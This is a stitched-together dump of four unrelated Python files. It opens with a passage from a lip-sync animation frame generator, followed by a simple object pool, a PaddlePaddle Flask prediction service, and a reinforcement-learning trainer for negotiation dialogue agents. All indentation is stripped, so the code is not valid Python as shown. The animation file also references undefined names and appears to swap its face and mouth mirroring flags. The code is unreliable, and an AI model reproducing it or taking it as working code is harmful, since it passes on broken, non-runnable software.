if split_pose[0] in characters:
        pose = characters[split_pose[0]]  # look up the base pose; the directional tag was split off above
else:
raise Exception(Fore.RED + '[ERR 412] Failed to load pose: ' + pose)
# determine whether to flip image
mirror_pose = False
mirror_mouth = False
looking_left = True
if len(split_pose) == 2:
if split_pose[1].lower() == 'right' or split_pose[1].lower() == 'r':
looking_left = False
if 'facingLeft' in pose and looking_left != pose['facingLeft']:
mirror_pose = True
if 'facingLeft' in pose and not pose['facingLeft']:
mirror_mouth = True
scale = 1
if 'default_scale' in characters:
scale = characters['default_scale']
if 'scale' in pose:
scale *= pose['scale']
return {
'face_path': characters['facesFolder'] + pose['image'],
'mouth_pos': [pose['x'], pose['y']],
'scale': float(scale),
'mirror_face': mirror_pose,
'mirror_mouth': mirror_mouth
}
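# Return the scaled dimensions of an image as a 'width:height' string.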
def getDimensions(path, scaler) -> str:
face = Image.open(path).convert('RGBA')
w = face.size[0]
h = face.size[1]
return f'{w * scaler}:{h * scaler}'
class FrameRequest:
face_path: str = ''
mouth_path: str = ''
mouth_scale: float = 1
mouth_x: int = 0
mouth_y: int = 0
    duration: float = 0.0
mirror_face: bool = False
mirror_mouth: bool = False
frame: int = 0
folder_name: str = 'images'
framerate = 100
dimensions: str = "TBD"
scaler: float = 1
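# Frames are rendered at 100 fps, so a duration in seconds maps to duration * 100 image files.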
def num_frames(frame_req: FrameRequest) -> int:
return int(frame_req.duration * 100)
def gen_frames(frame_req: FrameRequest, d):
global q
frame_req.duration = round(frame_req.duration, 2)
face = Image.open(frame_req.face_path).convert('RGBA')
face = face.resize([int(face.size[0] * frame_req.scaler), int(face.size[1] * frame_req.scaler)])
mouth = Image.open(frame_req.mouth_path).convert('RGBA')
mouth = mouth.resize([int(mouth.size[0] * frame_req.mouth_scale * frame_req.scaler),
int(mouth.size[1] * frame_req.mouth_scale * frame_req.scaler)])
if frame_req.mirror_face:
mouth = mouth.transpose(Image.FLIP_LEFT_RIGHT)
if frame_req.mirror_mouth:
face = face.transpose(Image.FLIP_LEFT_RIGHT)
centered_x = int((frame_req.mouth_x - mouth.size[0] / 2) * frame_req.scaler)
centered_y = int((frame_req.mouth_y - mouth.size[1] / 2) * frame_req.scaler)
mouth_pos = (centered_x, centered_y)
face.paste(mouth, mouth_pos, mouth)
image_path = f'generate/{frame_req.folder_name}/{frame_req.frame}.png'
face.save(image_path)
q.increment()
for frame in range(int(frame_req.duration * 100)):
image_path = f'generate/{frame_req.folder_name}/{frame_req.frame + frame}.png'
face.save(image_path)
q.increment()
    # busy-wait until the final frame file has been flushed to disk
while not os.path.isfile(image_path):
pass
face.close()
mouth.close()
class VideoRequest:
audio: str = ''
text: str = ''
mouths: str = ''
    character: str = ''
skip_frames: bool = False
    skip_thresh: float = 0.0
    framerate: int = 100
    dimensions: str = ''
    dimension_scaler: float = 1
    verbose: bool = False
    offset: float = 0.0
    poses_list: list = []
    poses_loc: list = []
crumple_zone: bool = False
timestamps: list = []
def gen_vid(req: VideoRequest):
# set up process vars
global verbose
global characters
global threads
characters = json.load(open(req.character, 'r'))
command.set_verbose(req.verbose)
verbose = req.verbose
phone_reference = json.load(open(str(req.mouths), encoding='utf8'))
    # run gentle forced alignment of the audio against the script text
gentle_out = gentle.align(req.audio, req.text)
v_out(gentle_out)
frame = FrameRequest()
frame_counter = 0
# set pose to be default, set mouth to be closed
pose = get_face_path(req.poses_list[0])
frame.face_path = pose['face_path']
frame.mouth_scale = pose['scale']
frame.mirror_face = pose['mirror_face']
frame.mirror_mouth = pose['mirror_mouth']
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['closed']
frame.mouth_x = pose['mouth_pos'][0]
frame.mouth_y = pose['mouth_pos'][1]
frame.frame = frame_counter
frame.scaler = req.dimension_scaler
if req.dimensions == 'TBD':
req.dimensions = getDimensions(pose['face_path'], req.dimension_scaler)
total_time = req.offset / 100
for w in range(len(gentle_out['words'])):
word = gentle_out['words'][w]
if word['case'] == 'success' and 'phones' in word:
# keep mouth closed between last word and this word
# duration = word['start'] - last_animated_word_end
duration = word['start'] - total_time
if duration > 0:
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['closed']
frame.frame = frame_counter
frame.duration = duration
total_time += frame.duration
# thread.start_new_thread(gen_frames, (frame, ))
threads.append(threading.Thread(target=gen_frames, args=(copy.deepcopy(frame), q,)))
threads[-1].start()
frame_counter += num_frames(frame)
# if using timestamps, see if pose should be swapped
for p in range(len(req.timestamps)):
if frame.frame >= req.timestamps[p]['time']:
pose = get_face_path(req.timestamps[p]['pose'])
frame.face_path = pose['face_path']
frame.mouth_scale = pose['scale']
frame.mirror_face = pose['mirror_face']
frame.mirror_mouth = pose['mirror_mouth']
frame.mouth_x = pose['mouth_pos'][0]
frame.mouth_y = pose['mouth_pos'][1]
frame.frame = frame_counter
# decrement each loc because each previous loc is an additional 'word' in the script in animate.py
for loc in range(len(req.poses_loc)):
req.poses_loc[loc] -= 1
# change pose
if len(req.poses_loc) > 0 and int(req.poses_loc[0]) == int(w) and len(req.timestamps) == 0:
pose = get_face_path(req.poses_list.pop(0))
req.poses_loc.pop(0)
frame.face_path = pose['face_path']
frame.mouth_scale = pose['scale']
frame.mirror_face = pose['mirror_face']
frame.mirror_mouth = pose['mirror_mouth']
frame.mouth_x = pose['mouth_pos'][0]
frame.mouth_y = pose['mouth_pos'][1]
frame.frame = frame_counter
# decrement each loc because each previous loc is an additional 'word' in the script in animate.py
for loc in range(len(req.poses_loc)):
req.poses_loc[loc] -= 1
# each phoneme in a word
for p in range(len(word['phones'])):
phone = (word['phones'][p]['phone']).split('_')[0]
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['phonemes'][phone]['image']
frame.duration = word['phones'][p]['duration']
frame.frame = frame_counter
total_time += frame.duration
# frame_counter = gen_frames(frame)
threads.append(threading.Thread(target=gen_frames, args=(copy.deepcopy(frame), q,)))
threads[-1].start()
frame_counter += num_frames(frame)
last_animated_word_end = word['end']
# make mouth closed at the end
frame.mouth_path = phone_reference['mouthsPath'] + phone_reference['closed']
frame.frame = frame_counter
if req.crumple_zone:
frame.duration = frame.framerate / 10
else:
frame.duration = 0.01
threads.append(threading.Thread(target=gen_frames, args=(copy.deepcopy(frame), q,)))
threads[-1].start()
frame_counter += num_frames(frame)
while q.count <= num_phonemes:
progress_bar(q.count)
for t in threads:
t.join()
return req.dimensions
|
pool.py
|
"""Simple Pool object"""
from queue import Queue
class Proxy:
"""Wraps original object with context manager that return the object to the
pool."""
def __init__(self, obj, pool):
self._obj = obj
self._pool = pool
def __enter__(self):
return self._obj
def __exit__(self, typ, val, tb):
self._pool._put(self._obj)
class Pool:
"""Pool of objects"""
def __init__(self, objects):
self._queue = Queue()
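        # queue.Queue is thread-safe, so the pool can be shared across threads
        # without additional locking.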
for obj in objects:
self._queue.put(obj)
def lease(self):
"""Lease an object from the pool, should be used as contect manger.
e.g.:
with pool.lease() as conn:
cur = conn.cursor()
cur.execute('SELECT ...')
"""
return Proxy(self._queue.get(), self)
def _put(self, obj):
self._queue.put(obj)
if __name__ == '__main__':
from threading import Thread, Barrier
from time import sleep
from random import random
n = 10
b = Barrier(n)
p = Pool([1, 2, 3])
def worker(n, barrier, pool):
barrier.wait() # Wait for all threads to be ready
sleep(random() / 10)
with pool.lease() as val:
print('worker %d got resource %d' % (n, val))
for i in range(n):
Thread(target=worker, args=(i, b, p)).start()
|
web_service.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
from flask import Flask, request, abort
from multiprocessing import Pool, Process
from paddle_serving_server import OpMaker, OpSeqMaker, Server
from paddle_serving_client import Client
from contextlib import closing
import socket
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
def load_model_config(self, model_config):
self.model_config = model_config
def _launch_rpc_service(self):
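        # Assemble the general_reader -> general_infer -> general_response op
        # sequence and start the RPC server on the first probed port.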
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(16)
server.load_model_config(self.model_config)
server.prepare_server(
workdir=self.workdir, port=self.port_list[0], device=self.device)
server.run_server()
def port_is_available(self, port):
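        # connect_ex returns 0 when something is already listening on the port,
        # so a non-zero result means the port is treated as available.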
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
def prepare_server(self, workdir="", port=9393, device="cpu"):
self.workdir = workdir
self.port = port
self.device = device
default_port = 12000
self.port_list = []
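        # Probe ports starting at 12000 and keep the first free one for the RPC endpoint.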
for i in range(1000):
if self.port_is_available(default_port + i):
self.port_list.append(default_port + i)
break
def _launch_web_service(self):
self.client = Client()
self.client.load_client_config("{}/serving_server_conf.prototxt".format(
self.model_config))
self.client.connect(["0.0.0.0:{}".format(self.port_list[0])])
def get_prediction(self, request):
if not request.json:
abort(400)
if "fetch" not in request.json:
abort(400)
try:
feed, fetch = self.preprocess(request.json["feed"],
request.json["fetch"])
if isinstance(feed, dict) and "fetch" in feed:
del feed["fetch"]
fetch_map = self.client.predict(feed=feed, fetch=fetch)
for key in fetch_map:
fetch_map[key] = fetch_map[key].tolist()
fetch_map = self.postprocess(
feed=request.json["feed"], fetch=fetch, fetch_map=fetch_map)
result = {"result": fetch_map}
except ValueError:
result = {"result": "Request Value Error"}
return result
def run_rpc_service(self):
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
p_rpc = Process(target=self._launch_rpc_service)
p_rpc.start()
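        # The RPC server runs in the child process started above; the Flask app
        # created below serves HTTP prediction requests in this process.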
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_web_service()
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
def run_web_service(self):
self.app_instance.run(host="0.0.0.0",
port=self.port,
threaded=False,
processes=1)
def get_app_instance(self):
return self.app_instance
def preprocess(self, feed=[], fetch=[]):
return feed, fetch
def postprocess(self, feed=[], fetch=[], fetch_map=None):
return fetch_map
|
multi_manager_debug.py
|
import argparse
import random
import json
import numpy as np
import time
from onmt.Utils import use_gpu
import logging
from cocoa.core.util import read_json
from cocoa.core.schema import Schema
from cocoa.core.scenario_db import ScenarioDB
from cocoa.neural.loss import ReinforceLossCompute
import cocoa.options
from core.scenario import Scenario
from core.controller import Controller
from systems import get_system
from neural.rl_trainer import RLTrainer
from neural import build_optim
import options
from neural.a2c_trainer import RLStatistics
from tensorboardX import SummaryWriter
import os
from buffer import ReplayBuffer
import torch
try:
import thread
except ImportError:
import _thread as thread
import multiprocessing
import multiprocessing.connection
import math
import pickle as pkl
import shutil
from multi_manager import MultiRunner, execute_runner
def init_dir(path, clean_all=False):
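    # Create `path` if missing; with clean_all, wipe any existing contents and
    # recreate the directory (retrying to cope with NAS latency).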
if not os.path.exists(path):
print('[Info] make dir {}'.format(path))
os.mkdir(path)
else:
print('[Warning] path {} exists!'.format(path))
if clean_all:
print('[Warning] clean files in {}!'.format(path))
shutil.rmtree(path, True)
# Deal with delay on NAS
while not os.path.exists(path):
os.mkdir(path)
print('[Info] remake dir {}'.format(path))
class MultiRunner:
def __init__(self, args, addr):
self.init_trainer(args)
# self.addr = self.get_real_addr(addr)
# self.conn = multiprocessing.connection.Client(self.addr)
def init_trainer(self, args):
if args.random_seed:
random.seed(args.random_seed+os.getpid())
np.random.seed(args.random_seed+os.getpid())
schema = Schema(args.schema_path)
scenario_db = ScenarioDB.from_dict(schema, read_json(args.scenarios_path), Scenario)
valid_scenario_db = ScenarioDB.from_dict(schema, read_json(args.valid_scenarios_path), Scenario)
# if len(args.agent_checkpoints) == 0
# assert len(args.agent_checkpoints) <= len(args.agents)
if len(args.agent_checkpoints) < len(args.agents):
ckpt = [None] * 2
else:
ckpt = args.agent_checkpoints
systems = [get_system(name, args, schema, False, ckpt[i], id=i) for i, name in enumerate(args.agents)]
rl_agent = 0
system = systems[rl_agent]
model = system.env.model
loss = None
# optim = build_optim(args, [model, system.env.critic], None)
optim = {'model': build_optim(args, model, None),}
if system.env.critic is not None:
optim['critic'] = build_optim(args, system.env.critic, None)
optim['critic']._set_rate(0.05)
if system.env.tom_model is not None:
optim['tom'] = build_optim(args, system.env.tom_model, None)
if args.tom_model not in ['naive', 'history']:
optim['tom_identity'] = build_optim(args, system.env.tom_model.encoder.identity, None)
# optim['tom']._set_rate(0.1)
scenarios = {'train': scenario_db.scenarios_list, 'dev': valid_scenario_db.scenarios_list}
from neural.a2c_trainer import RLTrainer as A2CTrainer
trainer = A2CTrainer(systems, scenarios, loss, optim, rl_agent,
reward_func=args.reward, cuda=(len(args.gpuid) > 0), args=args)
self.args = args
self.trainer = trainer
self.systems = systems
def get_real_addr(self, addr):
return addr
def simulate(self, cmd):
i, batch_size, real_batch = cmd
data = self.trainer.sample_data(i, batch_size, self.args, real_batch=real_batch)
return data
def train(self, epoch, batches, rewards, train_mode):
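        # One A2C update; in 'normal' mode the critic is trained for a few steps
        # with the policy frozen, then one joint policy+value update, then a few
        # more critic-only steps.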
update_table = {'policy': True, 'value': True}
with torch.autograd.set_detect_anomaly(True):
if train_mode == 'normal':
pretrain_number = 3
update_table['policy'] = False
for i in range(pretrain_number):
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
update_table['policy'] = True
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
update_table['policy'] = False
for i in range(pretrain_number):
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
elif train_mode == 'fix_value':
update_table['value'] = False
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
elif train_mode == 'fix_policy':
update_table['policy'] = False
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
else:
info = self.trainer.update_a2c(self.args, batches, rewards, self.trainer.model, self.trainer.critic,
discount=self.args.discount_factor, update_table=update_table)
return info
def trainset_valid(self, i, batch_size, real_batch, ):
data = self.trainer.sample_data(i, batch_size, self.args, real_batch=real_batch, eval=True)
return data
def get_eval_dict(self, examples, strategies):
ret = self.trainer.get_eval_dict(examples, strategies)
return ret
def valid(self, start, length):
infos = self.trainer.validate(self.args, length, start=start)
return infos
def save_model(self, i, valid_stats, score_type):
self.trainer.drop_checkpoint(self.args, i + 1, valid_stats,
model_opt=self.trainer.agents[self.trainer.training_agent].env.model_args,
score_type=score_type)
# if self.args.update_oppo:
# self.trainer.update_opponent(['policy', 'critic'])
def save_best_model(self, i, valid_stats, score_type, best_only):
self.trainer.drop_checkpoint(self.args, i + 1, valid_stats,
model_opt=self.trainer.agents[self.trainer.training_agent].env.model_args,
score_type=score_type, best_only=best_only)
def update_model(self, cmd):
model_idx, model_p, critic_p = cmd
env = self.systems[model_idx].env
env.model.load_state_dict(model_p)
env.critic.load_state_dict(critic_p)
def fetch_model(self, cmd):
model_idx = cmd[0]
env = self.systems[model_idx].env
return env.model.state_dict(), env.critic.state_dict()
def train_tom(self, model_idx, batch_iters, strategy, update_table=None, ret_table=None, dump_file=None):
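        # Fit the theory-of-mind model on pre-sampled dialogue batches;
        # update_table selects which parts (identity encoder vs. ToM predictor)
        # receive gradient updates.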
env = self.systems[model_idx].env
# if learn_type == 'id':
# update = {'id': True, 'tom': False}
# ret = {'id': True, 'tom': False}
# elif learn_type == 'id_tom':
# update = {'id': True, 'tom': True}
# ret = {'id': True, 'tom': True}
# elif learn_type == 'fixed_id_tom':
# update = {'id': False, 'tom': True}
# ret = {'id': True, 'tom': True}
# elif learn_type in ['history', 'naive']:
# update = {'id': False, 'tom': True}
# ret = {'id': False, 'tom': True}
# else:
# raise NameError('unknown learn_type ')
train_loss = self.trainer.update_tom(self.args, batch_iters, strategy, env.tom_model,
update_table=update_table,
ret_table=ret_table, dump_name=dump_file)
return train_loss
def valid_tom(self, model_idx, batch_iters, strategy, update_table=None, ret_table=None, dump_file=None):
env = self.systems[model_idx].env
update_table = {'id': False, 'tom': False}
valid_loss = self.trainer.update_tom(self.args, batch_iters, strategy,
env.tom_model, update_table=update_table,
ret_table=ret_table, dump_name=dump_file)
return valid_loss
def split_batch(self, batch_iters, batch_size, device=None):
ret = self.trainer._sort_merge_batch(batch_iters, batch_size, device=device)
return ret
def add_strategy_in_language(self, batch_iters, strategies):
self.trainer.add_strategy_in_language(batch_iters, strategies)
def send(self, cmd):
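        # Command dispatcher: known commands unpack pickled payloads and return
        # pickled results; anything else falls through to the universal
        # [method_name, args, kwargs] form handled in the else branch.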
if cmd[0] == 'quit':
return
elif cmd[0] == 'check':
# self.conn.send(['done'])
return ['done']
elif cmd[0] == 'simulate':
data = self.simulate(cmd[1:])
# self.conn.send(['done', pkl.dumps(data)])
return ['done', pkl.dumps(data)]
# try:
# except Exception, err:
# print(e)
# self.conn.send(['error'])
elif cmd[0] == 'train':
data = self.train(pkl.loads(cmd[1]))
# self.conn.send(['done', pkl.dumps(data)])
return ['done', pkl.dumps(data)]
# try:
# data = self.train(pkl.loads(cmd[1]))
# self.conn.send(['done', pkl.dumps(data)])
# except:
# self.conn.send(['error'])
elif cmd[0] == 'update_model':
self.update_model((cmd[1],) + pkl.loads(cmd[2]))
return ['done']
# self.conn.send(['done'])
# try:
# self.update_model(pkl.loads(cmd[1]))
# self.conn.send(['done'])
# except:
# self.conn.send(['error'])
elif cmd[0] == 'fetch_model':
data = self.fetch_model(cmd[1:])
return ['done', pkl.dumps(data)]
# self.conn.send(['done', pkl.dumps(data)])
# try:
# data = self.fetch_model(cmd[1:])
# self.conn.send(['done', pkl.dumps(data)])
# except:
# self.conn.send(['error'])
elif cmd[0] == 'valid':
data = self.valid(cmd[1])
return ['done', pkl.dumps(data)]
# self.conn.send(['done', pkl.dumps(data)])
elif cmd[0] == 'save_model':
self.save_model(pkl.loads(cmd[1]))
return ['done']
# self.conn.send(['done'])
else:
            # Fall back to the universal command format: [method_name, pickled_args, pickled_kwargs]
if len(cmd) < 2:
cmd.append([])
else:
cmd[1] = pkl.loads(cmd[1])
if len(cmd) < 3:
cmd.append({})
else:
cmd[2] = pkl.loads(cmd[2])
# try:
ret = getattr(self, cmd[0])(*cmd[1], **cmd[2])
status = 'done'
ret_data = ret
# except Exception as e:
# status = 'failed'
# print('[failed] ', e)
# ret_data = str(e)
ret_data = pkl.dumps(ret_data)
return [status, ret_data]
def local_send(self, cmd):
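        # In-process variant of send(): same [method_name, args, kwargs]
        # dispatch, but without pickling the payloads.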
if len(cmd) < 2:
cmd.append([])
if len(cmd) < 3:
cmd.append({})
# try:
ret = getattr(self, cmd[0])(*cmd[1], **cmd[2])
status = 'done'
ret_data = ret
# except Exception as e:
# status = 'failed'
# print('[failed] ', e)
# ret_data = str(e)
# ret_data = pkl.dumps(ret_data)
return [status, ret_data]
class MultiManager():
def __init__(self, num_cpu, args, worker_class):
self.local_workers = []
self.worker_addr = []
self.trainer_addr = []
self.args = args
for i in range(num_cpu):
addr = ('localhost', 7000 + i)
worker = worker_class(args, addr)
self.worker_addr.append(worker)
# self.local_workers.append(multiprocessing.Process(target=execute_runner, args=(worker_class, args, addr)))
self.local_workers.append(worker)
# self.trainer = multiprocessing.Process(target=execute_runner, args=(trainer_class, args))
self.trainer = self.local_workers[0]
self.worker_listener = []
for i, addr in enumerate(self.worker_addr):
# self.worker_listener.append(multiprocessing.connection.Listener(addr))
self.worker_listener.append(addr)
self.worker_conn = []
cache_path = 'cache/{}'.format(args.name)
log_path = 'logs/' + args.name
init_dir(cache_path)
init_dir(log_path, clean_all=True)
self.writer = SummaryWriter(logdir='logs/{}'.format(args.name))
self.policies_log = [{}, {}]
def run_local_workers(self):
for w in self.local_workers:
w.start()
def update_worker_list(self):
self.worker_conn = []
for l in self.worker_listener:
# self.worker_conn.append(l.accept())
self.worker_conn.append(l)
return len(self.worker_conn)
@staticmethod
def allocate_tasks(num_worker, batch_size):
        total_workers, total_tasks = num_worker, batch_size  # keep the originals for logging
        ret = []
        while num_worker > 0:
            ret.append(batch_size // num_worker)
            batch_size -= ret[-1]
            num_worker -= 1
        print('allocate: {} workers, {} tasks, final list: {}'.format(total_workers, total_tasks, ret))
return ret
def _draw_tensorboard(self, ii, losses, all_rewards):
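        # Log per-agent mean rewards and averaged loss components to TensorBoard.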
# print(all_rewards)
for j in range(2):
self.writer.add_scalar('agent{}/reward'.format(j), np.mean(all_rewards[j]), ii)
if len(losses[j]) > 0:
for k in losses[j][0]:
tmp = []
for l in losses[j]:
tmp.append(l[k])
tmp = np.concatenate(tmp[j])
tmp = np.mean(tmp)
self.writer.add_scalar('agent{}/{}'.format(j, k), tmp, ii)
self.writer.flush()
def _draw_tensorboard_valid(self, ii, all_rewards):
for j in range(2):
self.writer.add_scalar('agent{}/dev_reward'.format(j), all_rewards[j], ii)
def dump_examples(self, examples, verbose_strs, epoch, mode='train', other_path=None):
# Dump with details
args = self.args
if other_path is None:
path = args.model_path
else:
path = other_path
path_txt = '{root}/{model}_{mode}_example{epoch}.txt'.format(
root=path,
model=args.name,
mode=mode,
epoch=epoch)
path_pkl = '{root}/{model}_{mode}_example{epoch}.pkl'.format(
root=path,
model=args.name,
mode=mode,
epoch=epoch)
print('Save examples at {} and {}.'.format(path_txt, path_pkl))
with open(path_txt, 'w') as f:
for ex in verbose_strs:
f.write('-' * 7 + '\n')
for s in ex:
f.write(s + '\n')
with open(path_pkl, 'wb') as f:
pkl.dump(examples, f)
def evaluate(self):
num_worker = self.update_worker_list()
worker = self.worker_conn[0]
args = self.args
sample_size = args.batch_size
max_epoch = args.epochs
last_time = time.time()
if args.debug:
sample_size = 2
eval_dict = {}
separate_edict = [{} for _ in range(10)]
# add dd to d
def update_edict(d, dd):
for k in dd:
if d.get(k) is None:
d[k] = []
d[k] = d[k] + dd[k]
def get_result_dict(d):
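            # Collapse each metric list into its mean and std; num is the number
            # of recorded rewards.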
ret = {}
if d.get('reward') is None:
num = 0
else:
num = len(d.get('reward'))
for k in d:
ret[k] = np.mean(d[k])
ret[k+'_std'] = np.std(d[k])
return ret, num
for epoch in range(max_epoch):
last_time = time.time()
info = worker.local_send(['trainset_valid', (epoch, sample_size, sample_size)])
_batch_iters, batch_info, example, v_str = info[1]
_rewards, strategies = batch_info
data_pkl = 'cache/{}/data_{}.pkl'.format(args.name, epoch)
with open(data_pkl, 'wb') as f:
pkl.dump(info[1], f)
self.dump_examples(example, v_str, epoch, other_path='logs/'+args.name)
info = worker.local_send(['get_eval_dict', (example, strategies[1])])
ed, sed = info[1]
# log eval table as json file
eval_json = 'logs/{}/eval_{}.json'.format(args.name, epoch)
update_edict(eval_dict, ed)
tmpd, _ = get_result_dict(eval_dict)
tmpd['number'] = (epoch+1) * sample_size
with open(eval_json, 'w') as f:
json.dump(tmpd, f)
print('=' * 5 + ' [reward: {:.3f}\t utility: {:.3f}\t success_rate: {:.3f}]'.
format(tmpd['reward'], tmpd['utility'], tmpd["success_rate"]))
eval_json = 'logs/{}/eval_separate_{}.json'.format(args.name, epoch)
tmpds = []
for i in range(len(sed)):
update_edict(separate_edict[i], sed[i])
tmpd, num = get_result_dict(separate_edict[i])
tmpd['number'] = num
tmpd['strategy'] = i
tmpds.append(tmpd)
with open(eval_json, 'w') as f:
json.dump(tmpds, f)
print('=' * 5 + ' [Epoch {}/{}, {} dialogues for {:.3f}s.]'.
format(epoch + 1, max_epoch, (epoch+1)*sample_size, time.time() - last_time))
def learn_identity(self):
args = self.args
save_every = 100
batch_size = 100
split_results = False
if args.only_run:
batch_size = 1
# if args.tom_model == 'id':
# learn_type = 'identity'
# elif args.tom_model in ['history', 'naive']:
# learn_type = 'tom'
# else:# == 'idtom'
# learn_type = 'co-train'
if args.tom_model in ['id', 'uttr_id']:
update_table = {'id': True, 'tom': False}
ret_table = {'id': True, 'tom': False}
elif args.tom_model in ['uttr_fid_history_tom']:
update_table = {'id': False, 'tom': True}
ret_table = {'id': True, 'tom': True}
elif args.tom_model in ['uttr_id_history_tom', 'id_tom', 'id_history_tom']:
update_table = {'id': True, 'tom': True}
ret_table = {'id': True, 'tom': True}
elif args.tom_model in ['fixed_id_tom', 'fixed_id_history_tom']:
update_table = {'id': False, 'tom': True}
ret_table = {'id': True, 'tom': True}
elif args.tom_model in ['history', 'naive']:
update_table = {'id': False, 'tom': True}
ret_table = {'id': False, 'tom': True}
else:
raise NameError('unknown learn_type ')
if args.fix_id:
update_table['id'] = False
if args.only_run:
update_table = {'id': False, 'tom': False}
num_worker = self.update_worker_list()
worker = self.worker_conn[0]
train_agent = 0
load_data = args.load_sample
# Generate data samples or load from files
data_pkl = 'cache/{}/data.pkl'.format(args.name)
if load_data is None:
print('[Info] Start sampling.')
info = worker.send(['simulate', train_agent, args.num_dialogues, args.num_dialogues])
with open(data_pkl, 'wb') as f:
pkl.dump(pkl.loads(info[1]), f)
_batch_iters, batch_info, example, v_str = pkl.loads(info[1])
else:
print('[Info] Load sample from {}'.format(load_data))
info = ['done', None]
with open(load_data, 'rb') as f:
info[1] = pkl.load(f)
_batch_iters, batch_info, example, v_str = info[1]
_rewards, strategies = batch_info
# Single Thread!
if args.strategy_in_words:
worker.local_send(
['add_strategy_in_language', (_batch_iters, strategies)]
)
self.dump_examples(example, v_str, 0)
# Divide the training set
train_size = round(len(_batch_iters[1-train_agent]) * 0.6)
train_batch = _batch_iters[1-train_agent][:train_size]
train_strategy = strategies[1-train_agent][:train_size]
dev_batch = _batch_iters[1-train_agent][train_size:]
dev_strategy = strategies[1-train_agent][train_size:]
# if not, only learn identifier
if args.tom_model != 'id' and split_results:
dev_batches = [[], []]
dev_strategies = [[], []]
for i, s in enumerate(dev_strategy):
dev_batches[s].append(dev_batch[i])
dev_strategies[s].append(s)
dev_batch = dev_batches
dev_strategy = dev_strategies
dev_writer = [SummaryWriter(logdir='logs/{}/strategy_{}'.format(args.name, i)) for i in range(2)]
print('[Info] Start training model.')
step_range = 10
step_writer = [SummaryWriter(logdir='logs/{}/step_{}'.format(args.name, i)) for i in range(step_range)]
# split training batch
_, train_batch_splited = worker.local_send(
['split_batch', (train_batch, 1024)])
if args.tom_model != 'id' and split_results:
dev_batch_splited = [None, None]
_, dev_batch_splited[0] = worker.local_send(
['split_batch', (dev_batch[0], 1024)]
)
_, dev_batch_splited[1] = worker.local_send(
['split_batch', (dev_batch[1], 1024)]
)
else:
_, dev_batch_splited = worker.local_send(
['split_batch', (dev_batch, 1024)]
)
def draw_dev_info(loss, accu, step_info, name, w, i):
if ret_table['id']:
w.add_scalar('identity{}/{}_loss'.format(train_agent, name), loss[0], i)
w.add_scalar('identity{}/{}_accuracy'.format(train_agent, name), accu[0], i)
w.add_scalar('identity{}/{}_accuracy2'.format(train_agent, name), accu[2], i)
if ret_table['tom']:
w.add_scalar('tom{}/{}_intent_loss'.format(train_agent, name), loss[1], i)
w.add_scalar('tom{}/{}_intent_accuracy'.format(train_agent, name), accu[1], i)
w.add_scalar('tom{}/{}_price_loss'.format(train_agent, name), loss[2], i)
w.add_scalar('tom{}/{}_total_loss'.format(train_agent, name), loss[1] + loss[2], i)
w.flush()
# Draw outputs on the tensorboard
def draw_info(loss, accu, step_info, name, i):
draw_dev_info(loss, accu, None, name, self.writer, i)
for j, w in enumerate(step_writer):
if j >= len(step_info[2]):
break
if math.isnan(step_info[2][j]) or step_info[2][j] == 0:
continue
if ret_table['id']:
w.add_scalar('identity{}/{}_loss'.format(train_agent, name), step_info[0][0][j], i)
w.add_scalar('identity{}/{}_accuracy'.format(train_agent, name), step_info[1][0][j], i)
w.add_scalar('identity{}/{}_accuracy2'.format(train_agent, name), step_info[1][2][j], i)
if ret_table['tom']:
w.add_scalar('tom{}/{}_intent_loss'.format(train_agent, name), step_info[0][1][j], i)
w.add_scalar('tom{}/{}_intent_accuracy'.format(train_agent, name), step_info[1][1][j], i)
w.add_scalar('tom{}/{}_price_loss'.format(train_agent, name), step_info[0][2][j], i)
w.flush()
# train model
cur_t = time.time()
for i in range(args.epochs):
# print('train.send:')
info = worker.local_send(
['train_tom', (train_agent, train_batch_splited,
train_strategy, update_table, ret_table,
'cache/{}/train_pred_{}.pkl'.format(args.name, i))])
train_loss, train_accu, train_step_info = info[1]
if args.only_run:
save_dir = 'logs/{}/hidden_vec_{}.pkl'.format(args.name, i)
total_num = 0
for j in range(len(worker.trainer.hidden_vec)):
assert worker.trainer.hidden_vec[j].shape[0] == worker.trainer.hidden_stra[j].shape[0], \
"miss match at {}, {} of {}".format(worker.trainer.hidden_vec[j].shape, worker.trainer.hidden_stra[j].shape, j)
total_num = total_num + len(worker.trainer.hidden_stra[j])
with open(save_dir, "wb") as f:
pkl.dump([worker.trainer.hidden_vec, worker.trainer.hidden_stra], f)
print("accu:", train_accu)
